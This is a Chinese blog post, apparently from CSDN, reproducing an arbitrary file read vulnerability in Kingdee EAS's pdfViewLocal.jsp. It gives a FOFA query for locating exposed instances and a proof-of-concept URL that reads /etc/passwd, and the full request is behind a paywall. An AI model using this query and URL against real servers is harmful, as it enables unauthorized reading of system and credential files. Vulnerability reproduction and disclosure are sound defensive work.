金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件

最新推荐文章于 2024-04-30 17:28:01 发布
最新推荐文章于 2024-04-30 17:28:01 发布
阅读量689 收藏 7
点赞数 8
分类专栏: 漏洞复现 文章标签: java 开发语言 安全 web安全 网络 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/135468255
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 金蝶EAS简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

金蝶EAS Cloud采购管理系统是专业的采购平台管理系统

2.漏洞描述

金蝶EAS 为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

金蝶EAS

金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞

4.fofa查询语句

app="Kingdee-EAS"

5.漏洞复现

漏洞链接:https://127.0.0.1/plt_document/fragments/content/pdfViewLocal.jsp?path=/etc/passwd

漏洞数据包:

GET /plt_document/fragments/content/pdfViewLo
了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [POC]
薛定谔嘚喵博客
12-02 592
金蝶Apusic应用服务器 deployApp 接口存在任意文件上传漏洞,击者可通过双斜杠绕过鉴权并上传恶意压缩包到服务器,导致远程代码执行,危及服务器安全,接管服务器权限。
金蝶EAS8.2数据字典.xls
09-01
金蝶EAS8.2数据字典Excel(含表结构)
【复现】金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 1023
【复现】金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件
金蝶-EAS easWebClient 任意文件读取漏洞复现
02-20 732
金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。
金蝶EAS pdfviewlocal 任意文件读取漏洞复现
0xSec
01-08 989
金蝶EAS pdfviewlocal接口存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
金蝶EAS pdfviewlocal任意文件读取漏洞
Keepb1ue的博客
01-08 2089
金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。金蝶 EAS Cloud pdfViewLocal.jsp存在任意文件读取漏洞漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件
金蝶EAS pdfviewlocal 任意文件读取漏洞
3tefanie丶zhou的博客
01-09 712
【少年不惧岁月长,彼方尚有荣光在。】
金蝶云星空RCE漏洞复现
0xSec
06-21 9080
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
漏洞复现】​金蝶云星空管理中心反序列化命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
07-23 3095
金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。该软件存在远程命令执行漏洞,外部攻击者可通过使用恶意攻击手段对目标系统进行权限获取,进而接管服务器控制权。
金蝶云星空任意文件读取漏洞复现(0day)
0xSec
07-31 2361
由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
EAS接口文档1
05-31
EAS接口文档,主要应用于EAS开发EAS接口文档,主要应用于EAS开发
金蝶 EAS 凭证引入 “webservice 接口”说明
08-15
金蝶 EAS WebService总账(凭证引入)接口说明。会计凭证webservice 导入接口
金蝶EAS V8.2 发版说明.pdf
03-19
金蝶EAS V8.2 发版说明
金蝶EAS DEP脚本汇总.docx
12-17
金蝶EAS DEP脚本汇总.
金蝶EAS V8.5 发版说明.pdf
10-03
金蝶EAS V8.5 发版说明 产品简介 时代在快速发生着变化,人工智能、区块链、云计算、大数据、IOT 等新技术在广泛影 响着社会的发展,同时企业管理也在发生的变化:组织边界模糊、多元共生、个体崛起、共 享管理等,...
金蝶EAS通过套打模板实现后台生成PDF文件.docx
06-10
EAS开发中,如果需要合同调用套打模板自动生成PDF进行档案归档备份,可通过后台服务器代码进行开发实现;
java方法重写(重点讲),方法重载
weixin_46281068的博客
04-27 878
一、方法重载定义:一个类中,出现多个方法的名称相同,但是它们的形参列表是不同的,那么这些方法就称为方法重载了。注意:一个类中,只要一些方法的名称相同、形参列表不同,那么它们就是方法重载了,其它的都不管(如:修饰符,返回值类型是否一样都无所谓)。形参列表不同指的是:形参的个数、类型、顺序不同,不关心形参的名称。应用场景:开发中我们经常需要为处理一类业务,提供多种解决方案,此时用方法重载来设计是很专业的。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 860
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
链表刷题集
最新发布
yajunjiao的专栏
04-30 264
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
金蝶eas文件上传漏洞
10-13
这个漏洞存在金蝶eas文件上传功能中,攻击者可以通过构造特定的上传请求来绕过文件类型检查和安全限制。 为了防止这种漏洞的发生,金蝶eas开发者应该加强对文件上传功能的安全性检查,例如限制上传文件的类型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值